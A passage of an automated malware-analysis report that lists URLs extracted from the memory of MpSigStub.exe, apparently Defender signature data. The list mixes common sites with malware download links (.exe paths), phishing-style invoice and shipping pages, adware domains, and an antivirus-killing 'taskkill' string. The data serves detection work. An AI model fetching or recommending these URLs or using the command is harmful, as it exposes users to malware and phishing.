Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.jeegtube.com/databack.php
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.jplineage.com/firo/mail.asp?tomail=163
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.judios.org/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.kaolabao.net/bo/update.ini
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.kerstingutleder.at//p.o/next.php
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.kreher.tv/dhes/images/images/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.labsus.org/images/web/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.lindenmontessori.com/cgi-bin/hr_9x/
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.lk2006.com/q15/index.htm
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.lycos.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.mail-kunren.jp/sample2018jb1e/index.html?src=
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.malcoimages.com/bk/22/view.php
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.manyakpc.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mapquest.com
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.mathrandomfloor/photo.txt?buttonnumdiskmlkjihgfed:
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://www.mcafee.com93.73.148.17eset.com93.73.148.17
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mcmoney2012.com/fxf09.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mindcrash.it/upload/galleriafotografica
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mlb.com
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://www.moliv.com.br/stat/email0702/
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.monster.com
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.mt-download.com/mtrslib2.js
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.mva.by/tags/ariscanin1.e
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.mvps.org/vb
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.nba.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.netscape.com
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.norton-kaspersky.com/trf/tools
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.nytimes.com
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ooooos.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.orkut.com.br/Home.aspx
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pardislab.com/ups-us/feb-12-18-04-16-13/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornhub.com/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.pppp123456.cn/welcome.php?k=
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pricemeter.net/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pricemeter.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.prostol.com/m.html
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq5.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.rico09.net/nighteyes/96/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.rits.ga/excel/view.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.sacbarao.kinghost.net/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://www.seatoskycomputerguy.com/zw/oz/serozv.exe
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.sniperspy.com/guide.html
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.soporteczamora.com/ups-ship-notification/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.soso.com/q?w=%s&lr=&sc=web&ch=w.p&filter=1&num=10&pg=%d
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sotrag.eu/invoice
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://www.start-space.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.steelbendersrfq.cf/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.surprisingdd.top
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweet-page.com/?type=sc
